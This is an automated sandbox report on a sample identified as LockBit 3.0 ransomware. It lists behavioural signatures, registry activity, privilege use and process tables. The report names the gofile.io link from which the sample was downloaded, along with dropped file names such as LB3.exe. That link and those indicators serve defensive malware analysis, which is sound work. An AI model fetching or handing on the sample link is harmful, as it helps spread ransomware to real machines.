Malware Analysis Report

2025-05-05 20:48

Sample ID 250417-vl71xaxps2
Target https://gofile.io/d/OVEE6R
Tags
lockbit defense_evasion discovery execution ransomware spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://gofile.io/d/OVEE6R was found to be: Known bad.

Malicious Activity Summary

lockbit defense_evasion discovery execution ransomware spyware stealer upx

Lockbit

Rule to detect Lockbit 3.0 ransomware Windows payload

Lockbit family

Renames multiple (656) files with added filename extension

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Drops desktop.ini file(s)

Indicator Removal: File Deletion

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Subvert Trust Controls: Mark-of-the-Web Bypass

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Modifies data under HKEY_USERS

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

NTFS ADS

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-17 17:05

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-17 17:05

Reported

2025-04-17 17:07

Platform

win11-20250410-en

Max time kernel

74s

Max time network

88s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/OVEE6R

Signatures

Lockbit

ransomware lockbit

Lockbit family

lockbit

Rule to detect Lockbit 3.0 ransomware Windows payload

Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (656) files with added filename extension

ransomware

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$Recycle.Bin\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini C:\Users\Admin\Downloads\LB3.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini C:\Users\Admin\Downloads\LB3.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini C:\Users\Admin\Downloads\LB3.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A api.gofile.io N/A N/A
N/A api.gofile.io N/A N/A
N/A api.gofile.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\spool\PRINTERS\00002.SPL C:\Windows\splwow64.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PPm701o5mcrl9yidh2ldcujt07.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PPfcxul87k_i2bawdma2f3h0apc.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PPf0f_blq7jjs5emau7gadpir_.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\00003.SPL C:\Windows\splwow64.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PP3husm526qa5cns6a7bqtg2mr.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PP30p004bpqaqxjo403w2f08tr.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A
File created C:\Windows\system32\spool\PRINTERS\PP6jqdeqy3uqwqmv3fa6g4mj87c.TMP C:\Windows\system32\printfilterpipelinesvc.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\ProgramData\1336.tmp N/A
N/A N/A C:\ProgramData\BDCE.tmp N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\LICENSE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Subvert Trust Controls: Mark-of-the-Web Bypass

defense_evasion
Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\LB3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\1336.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\LB3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\BDCE.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133893831615051936" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2627618461-2240074273-3604016983-1000\{4DFF0642-E14C-4F33-BD66-A484B647F6D4} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A
N/A N/A C:\Users\Admin\Downloads\LB3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: 36 N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: 33 N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Downloads\LB3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1128 wrote to memory of 5304 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 5304 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4928 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4980 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1128 wrote to memory of 4240 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
